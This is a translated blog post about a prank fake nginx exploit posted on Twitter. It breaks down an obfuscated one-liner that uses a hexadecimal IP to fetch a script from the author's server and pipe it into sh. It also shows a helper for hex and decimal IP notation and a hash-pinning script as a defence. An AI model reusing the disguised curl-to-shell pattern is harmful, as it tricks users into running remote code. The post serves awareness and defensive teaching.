A successful social engineering experiment with a fake nginx exploit

Translator's note: the author of the original text, published on June 1, decided to run an experiment on people interested in information security. To do so, he crafted a fake exploit for an unknown vulnerability in the web server and posted it on Twitter. His expectation, that it would be exposed immediately by specialists who would spot the obvious trick in the code, did not come true ... read on for the details.


TL;DR: Never pipe file contents into sh or bash, under any circumstances. It is a great way to lose control of your machine.

I want to share a short story about a magic PoC that appeared on May 31st. It was thrown together quickly in response to news from Alisa Esage Shevchenko, a member of the Zero Day Initiative (ZDI), that details of an NGINX vulnerability leading to RCE (remote code execution) would be disclosed soon. Since NGINX powers a huge share of websites, the news should have been a bombshell. But because of the "responsible disclosure" delay, the details of what had been found were not known; that is ZDI's standard procedure.

Tweet about the disclosure of a vulnerability in NGINX

Having just finished working on a new curl obfuscation technique, I quoted the original tweet with a "PoC release" containing a single line of code that supposedly exploited the discovered vulnerability. Naturally, it was complete nonsense. I assumed it would be exposed immediately and that at best I would get a couple of retweets (oh well).

Tweet with the fake exploit

However, I could not have imagined what happened next. The popularity of my tweet skyrocketed. Surprisingly, at the time of writing (15:00 Moscow time on June 1) few people have realised that it is a fake. Many retweet it without checking at all (let alone admiring the beautiful ASCII art it prints).

Just look at how beautiful it is!

While all those loops and colours are nice, it was obvious that people had to run the code on their own machines to see it. Fortunately, browsers behave the same way, and combined with the fact that I really did not want to get into legal trouble, the code hosted on my site only issued echo calls without trying to install or run anything extra.

A small digression: netspooky, dnz, myself and the rest of the Thugcrowd crew have been playing with various ways of obfuscating command lines for a while, because it is fun ... and we are geeks. netspooky and dnz found several new techniques that I found extremely promising. I joined the fun and tried to add decimal IP conversion to the bag of tricks. It turns out an IP can also be written in hexadecimal form. Moreover, curl and most other NIX tools happily consume hexadecimal IPs! So it was just a matter of building a convincing and nice-looking command line. In the end I settled on this:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
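To make the notation trick concrete, here is a small POSIX sh helper (an added example, not code from the original post or from the Thugcrowd crew) that converts between the dotted-quad, decimal and hexadecimal spellings of an IPv4 address. The sample addresses are the loopback address and a documentation-range address chosen for the demo, not the author's server; it runs offline.

```shell
#!/bin/sh
# Added example (not from the original post): convert between the dotted-quad,
# decimal and hexadecimal spellings of an IPv4 address, the notation trick the
# one-liner relies on. Pure POSIX sh arithmetic, no external tools.
# Sample addresses used with it (127.0.0.1, 192.0.2.1) are constructed input.

# dotted quad -> 32-bit unsigned integer, printed in decimal
ip_to_dec() {
    oldifs=$IFS; IFS=.
    set -- $1
    IFS=$oldifs
    [ $# -eq 4 ] || { echo "bad address" >&2; return 1; }
    for o in "$@"; do
        case $o in ''|*[!0-9]*) echo "bad octet: $o" >&2; return 1;; esac
        [ "$o" -le 255 ] || { echo "octet out of range: $o" >&2; return 1; }
    done
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# dotted quad -> 0x-prefixed hexadecimal, zero-padded to 8 digits
ip_to_hex() {
    n=$(ip_to_dec "$1") || return 1
    printf '0x%08x\n' "$n"
}

# decimal or 0x-hex integer -> dotted quad (the address the tool will really use)
int_to_ip() {
    n=$(( $1 ))   # sh arithmetic accepts both 3221225985 and 0xc0000201
    [ "$n" -ge 0 ] && [ "$n" -le 4294967295 ] || { echo "out of range" >&2; return 1; }
    echo "$(( (n >> 24) & 255 )).$(( (n >> 16) & 255 )).$(( (n >> 8) & 255 )).$(( n & 255 ))"
}
```

With the helpers loaded, `ip_to_hex 127.0.0.1` prints 0x7f000001 and `int_to_ip 0xc0000201` prints 192.0.2.1. Tools that hand the host string to the libc resolver get all three spellings accepted (inet_aton parses decimal and hexadecimal forms), which is why a bare hexadecimal token on a curl command line is a perfectly valid URL. When reviewing a suspicious one-liner, run every numeric host through int_to_ip before deciding it is "just localhost".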

Socio-electronic engineering (SEE): more than just phishing

Safety and familiarity were a large part of the experiment. I think they are what made it succeed. The command line explicitly hints at safety by mentioning "127.0.0.1" (the well-known localhost). Localhost is considered safe, and whatever is on it never leaves your computer.

Familiarity was the second SEE component of the experiment. Since the target audience consisted mainly of people who know the basics of computer security, it was important to build the code so that its parts looked familiar and recognisable (and therefore safe). Borrowing elements from old exploit concepts and combining them in an unusual way proved very successful.

Below is a detailed breakdown of the one-liner. Everything in this list is cosmetic decoration; essentially none of it is needed for the line to actually work.

Which components are really needed? These: -gsS, -O 0x0238f06a, |sh and the web server itself. The web server contained no malicious instructions; it only served ASCII art through echo commands in a script inside index.html. When a user entered the line with |sh in the middle, index.html was downloaded and executed. Fortunately, the web server's administrator had no malicious intent. Two details worth knowing when you dissect such a line: curl accepts any number of URLs on one command line, so the hexadecimal token after -O is parsed as a second URL whose host is that address; and -g disables URL globbing while -s suppresses the progress meter and -S still reports errors, which keeps the output clean for sh to consume.

  • ../../../%00 - suggests directory traversal;
  • ngx_stream_module.so - the path to an arbitrary NGINX module;
  • /bin/sh%00<'protocol:TCP' - we supposedly start /bin/sh on the target machine and redirect its output into a TCP channel;
  • -O 0x0238f06a#PLToffset - the secret ingredient, with the #PLToffset appendage making it look like some memory offset inside the PLT;
  • |sh; - another essential piece. We had to redirect the output to sh/bash in order to deliver the code, which is downloaded from the attacker's server at 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - a dummy in which netcat points at /dev/tcp/localhost so that everything looks safe once again. In fact it does nothing and is there purely for the beauty of the line.
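Here is the habit the TL;DR recommends, written out as a POSIX sh script (an added example, not code from the original post): save what the server returned to a file, hash it, and execute it only when the hash matches a value pinned in advance. The "downloaded" payload is constructed inline, with the same kind of echo lines the fake PoC served plus one extra command, so the demo runs offline; sha256sum (or shasum) and mktemp are assumed to be available.

```shell
#!/bin/sh
# Added example, not from the original post: replace "curl ... | sh" with
# fetch, inspect, verify, then run. Nothing executes until the file is on
# disk and its SHA-256 matches a value pinned ahead of time.
# Assumes sha256sum (coreutils) or shasum, plus mktemp.

# SHA-256 of a file, using whichever hashing tool the host has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Execute a fetched script only if its hash equals the pinned one.
# Exit status: that of the script on a match, 2 when the hash differs.
run_if_pinned() {
    file=$1
    expected=$2
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "refusing to run $file: sha256 $actual does not match pinned $expected" >&2
        return 2
    fi
    sh "$file"
}

# Demo. The payload is constructed sample content standing in for what the
# server's index.html returned: ASCII-art echo lines, plus one line that the
# art would have drowned out on a terminal and that "| sh" runs blindly.
demo() {
    tmp=$(mktemp) || return 1
    cat >"$tmp" <<'EOF'
echo '  _____ __                                               __'
echo ' /_  __/ /_  __  ______ ______________ _      ______/ /'
printf 'this line ran as %s without anyone reading it\n' "$(id -un)"
EOF
    pinned=$(sha256_of "$tmp")           # in real use: published out of band

    run_if_pinned "$tmp" "$pinned" && first=0 || first=$?
    echo 'echo tampered' >>"$tmp"        # server swaps content after review
    run_if_pinned "$tmp" "$pinned" && second=0 || second=$?

    rm -f "$tmp"
    echo "untampered run exit=$first, tampered run exit=$second"
    [ "$first" -eq 0 ] && [ "$second" -eq 2 ]
}
```

In real use the fetch is `curl -sSf -o payload.sh URL`, followed by reading payload.sh in an editor and `run_if_pinned payload.sh <hash published by the author>`; the pinned hash has to come from somewhere other than the server that serves the script, otherwise an attacker who controls the content also controls the hash. The point the demo makes is that a server can return one thing to the person who reviews it and another to the next visitor, and only a check on the bytes you are about to execute catches that.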

This completes the walkthrough of the one-liner and the discussion of "socio-electronic engineering" (advanced phishing).

Web server tweaks and experiments

Since most of my followers are infosec people and hackers, I decided to make the web server a bit more resistant to displays of "interest" on their part, so that the guys would have something to do (and it was fun to set up). I will not list all the traps here, since the experiment is still ongoing, but here are a few things the server does:

  • It monitors attempts to share the link on certain social networks and substitutes various thumbnails to encourage the user to click it.
  • It redirects Chrome/Mozilla/Safari/etc. to the Thugcrowd promo video instead of showing the shell script.
  • It watches for obvious signs of intrusion or blatant hacking, then starts redirecting those requests to NSA servers (ha!).
  • It installs a trojan, as well as a BIOS rootkit, on every computer whose user visits it from a regular browser (just kidding!).

A small portion of the countermeasures

In this case my only goal was to learn a bit of Apache, specifically its neat rules for redirecting requests, and I thought: why not?

NGINX Exploit (the real one!)

Follow @alisaesage on Twitter and keep an eye on ZDI's great work on real vulnerabilities and their exploitation in NGINX. Their work has always fascinated me, and I am grateful to Alisa for her patience with all the mentions and notifications my silly tweet caused. Fortunately, it also did some good: it helped raise awareness both of the NGINX vulnerability and of the problems that command-line obfuscation can cause.

Source: www.habr.com
